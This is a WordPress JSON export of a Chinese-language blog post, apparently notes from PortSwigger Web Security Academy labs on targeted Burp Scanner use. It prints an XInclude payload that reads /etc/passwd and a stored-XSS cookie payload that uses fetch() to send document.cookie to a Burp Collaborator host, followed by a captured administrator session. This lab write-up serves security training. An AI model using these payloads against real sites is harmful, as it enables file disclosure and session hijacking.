{"id":1867,"date":"2023-06-03T15:56:00","date_gmt":"2023-06-03T07:56:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1867"},"modified":"2025-07-27T18:24:13","modified_gmt":"2025-07-27T10:24:13","slug":"burp-scanner","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1867","title":{"rendered":"Burp Scanner"},"content":{"rendered":"\n<p>\u9664\u4e86\u53ef\u7528<code>Burp Scanner<\/code>\u5168\u7ad9\u6383\u63cf\u5916\uff0c\u4e5f\u53ef\u512a\u5316\u624b\u52d5\u6e2c\u8a66\u5de5\u4f5c\u6d41\u7a0b\uff0c\u5e38\u898b\u7684\u7528\u6cd5\u6709\u4ee5\u4e0b2\u7a2e<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u6383\u63cf\u7279\u5b9a\u8acb\u6c42<\/h2>\n\n\n\n<p>\u5982\u679c\u9047\u5230\u6709\u8da3\u7684\u529f\u80fd\u6216\u884c\u70ba\u6642\uff0c\u53ef\u5c07\u8acb\u6c42\u4ea4\u7d66 Burp Scanner\u6e2c\u8a66\u662f\u5426\u6709\u5b89\u5168\u554f\u984c\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p>\u700f\u89bd\u7db2\u7ad9\u5206\u6790\u8acb\u6c42\u6642\uff0c\u767c\u73fe<code>\/product\/stock<\/code>\u8acb\u6c42\uff0c\u8a72\u8acb\u6c42\u7684\u53c3\u6578ProductID\u770b\u8d77\u4f86\u5f88\u53ef\u7591\uff0c\u7814\u5224\u662f\u662f\u6613\u53d7\u653b\u64ca\u7684\u7aef\u9ede<\/p>\n\n\n\n<p>\u53ef\u5728<code>proxy\/http history<\/code>\u4e0b\u9078\u64c7<code>\/product\/stock<\/code>\uff0c\u4e26\u6309\u53f3\u9375\u9078<code>Do Active Scan<\/code><\/p>\n\n\n\n<p>\u6383\u63cf\u5f8c\u5c31\u6703\u767c\u73fe\u6709out-of-band resource load(HTTP)\u554f\u984c\uff0c\u9019\u53ef\u80fd\u5f15\u5c0e\u61c9\u7528\u7a0b\u5f0f\u6aa2\u7d22\u4efb\u610f\u5916\u90e8URL\u7684\u5167\u5bb9\u4e26\u5728\u81ea\u5df1\u7684\u56de\u61c9\u4e2d\u50b3\u56de\u9019\u4e9b\u5167\u5bb9\uff0c\u56e0\u6b64\u53ef\u4ee5\u5728\u8acb\u6c42\u624b\u52d5\u589e\u52a0XML\u53d6\u5f97<code>\/etc\/password<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/product\/stock HTTP\/1.1\n...omit...\n\nproductId=&lt;foo xmlns:xi=\"http:\/\/www.w3.org\/2001\/XInclude\">&lt;xi:include parse=\"text\" href=\"file:\/\/\/etc\/passwd\"\/>&lt;\/foo>&amp;storeId=1<\/code><\/pre>\n\n\n\n<p>Lab: Discovering vulnerabilities quickly with targeted scanning<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6383\u63cf\u81ea\u8a02\u63d2\u5165\u9ede<\/h2>\n\n\n\n<p>\u5982\u679c\u5c0d\u8acb\u6c42\u4e2d\u7684\u53c3\u6578\u6709\u8208\u8da3\uff0c\u53ef\u4ee5\u6307\u5b9a\u53c3\u6578\u6e2c\u8a66\u662f\u5426\u6709\u5b89\u5168\u554f\u984c\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p>\u5206\u6790\u7db2\u7ad9\u5f8c\u767c\u73fe\u8acb\u6c42\u4e2dwiener\u5b57\u4e32\u5f88\u53ef\u7591\uff0c\u56e0\u6b64\u9078\u64c7\u8a72\u5b57\u4e32\u4e26\u53f3\u9375\u9078<code>scan manual insertion point<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/my-account?id=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">wiener<\/mark> HTTP\/1.1\nHost: 0a24008b03c8fdc781b2129000450061.web-security-academy.net\nConnection: close\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.105 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nReferer: &lt;https:\/\/0a24008b03c8fdc781b2129000450061.web-security-academy.net\/login>\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: session=wiener%3aOPE3sqEQ5dscrWnH1kGPvQrE2uKyM2mK<\/code><\/pre>\n\n\n\n<p>\u6383\u63cf\u5b8c\u5f8c\u53ef\u5728dashboard\u4e2d\u770b\u5831\u544a\uff0c\u6703\u767c\u73feCross-site scripting (stored)\u5b89\u5168\u554f\u984c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/my-account?id=wiener HTTP\/1.1\nHost: 0a24008b03c8fdc781b2129000450061.web-security-academy.net\nConnection: close\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.105 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nReferer: &lt;https:\/\/0a24008b03c8fdc781b2129000450061.web-security-academy.net\/login>\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: session='%22%3e%3csvg%2fonload%3dfetch%60%2f%2f<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">7hp0l2dgbf5gi9x5uwe4uu3wxn3gr6fy5mwcj27r%5c.burpcollaborator.net<\/mark>%60%3e%3aOPE3sqEQ5dscrWnH1kGPvQrE2uKyM2mK<\/code><\/pre>\n\n\n\n<p>\u5230Collaborator\u53d6\u5f97\u65b0\u7684\u4f4d\u7f6eg4l3v1mkp2sxyue30wwex79u9lfb30.burpcollaborator.net \u4e26\u66ff\u63db\u539f\u672c\u8acb\u6c42\u7684\u4f4d\u7f6e\u5f8c\u91cd\u65b0\u9001\u51fa\u8acb\u6c42<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/my-account?id=wiener HTTP\/1.1\nHost: 0acc00ec04dbbaf98304bed20018002e.web-security-academy.net\nConnection: close\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.105 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nReferer: &lt;https:\/\/0acc00ec04dbbaf98304bed20018002e.web-security-academy.net\/login>\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: session='\">&lt;svg\/onload=fetch(\/\/<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">g4l3v1mkp2sxyue30wwex79u9lfb30.burpcollaborator.net<\/mark>\/${encodeURIComponent(document.cookie)})>:OPE3sqEQ5dscrWnH1kGPvQrE2uKyM2mK\n<\/code><\/pre>\n\n\n\n<p>\u5728Collaborator\u6703\u63a5\u6536\u5230\u4ee5\u4e0b\u5167\u5bb9\uff0c\u53ef\u4ee5\u770b\u5230session=administrator:3aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm\uff0c\u6210\u529f\u53d6\u5f97\u6700\u9ad8\u7ba1\u7406\u54e1\u7684session<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-orange-color\">session%3Dadministrator%253aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm<\/mark>%3B%20secret%3DLCh8KAlFhQbU6Qf8xqnD2w0KZ7sEZcW6%3B%20session%3Dadministrator%253aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm HTTP\/1.1\nHost: g4l3v1mkp2sxyue30wwex79u9lfb30.burpcollaborator.net\nConnection: keep-alive\nsec-ch-ua: \"Google Chrome\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla\/5.0 (Victim) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36\nsec-ch-ua-platform: \"Linux\"\nAccept: *\/*\nOrigin: &#91;&lt;https:\/\/0acc00ec04dbbaf98304bed20018002e.web-security-academy.net>](&lt;https:\/\/0acc00ec04dbbaf98304bed20018002e.web-security-academy.net\/>)\nSec-Fetch-Site: cross-site\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: &lt;https:\/\/0acc00ec04dbbaf98304bed20018002e.web-security-academy.net\/>\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.9\n<\/code><\/pre>\n\n\n\n<p>Lab: Scanning non-standard data structures<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u9664\u4e86\u53ef\u7528Burp Scanner\u5168\u7ad9\u6383\u63cf\u5916\uff0c\u4e5f\u53ef\u512a\u5316\u624b\u52d5\u6e2c\u8a66\u5de5\u4f5c\u6d41\u7a0b<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[369],"tags":[],"class_list":["post-1867","post","type-post","status-publish","format-standard","hentry","category-red-team"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1867","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1867"}],"version-history":[{"count":1,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1867\/revisions"}],"predecessor-version":[{"id":2409,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1867\/revisions\/2409"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1867"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1867"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1867"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}